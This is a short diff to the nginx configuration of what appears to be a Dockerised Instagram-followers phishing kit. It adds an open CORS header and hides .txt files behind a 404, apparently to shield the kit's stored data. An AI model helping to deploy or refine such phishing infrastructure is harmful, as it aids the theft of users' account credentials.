--- a/instagram_followers_phishing_dockerized/docker/nginx/conf.d/default.conf
+++ b/instagram_followers_phishing_dockerized/docker/nginx/conf.d/default.conf
@@ -5,8 +5,14 @@ server {
   error_log  /var/log/nginx/error.log;
   access_log /var/log/nginx/access.log;
   
+  add_header "Access-Control-Allow-Origin" "*";
+
   root /var/www/html;
-  
+
+  location ~\.txt {
+    return 404;  
+  }
+
   location ~ \.php$ {
     try_files $uri =404;
     fastcgi_split_path_info ^(.+\.php)(/.+)$;
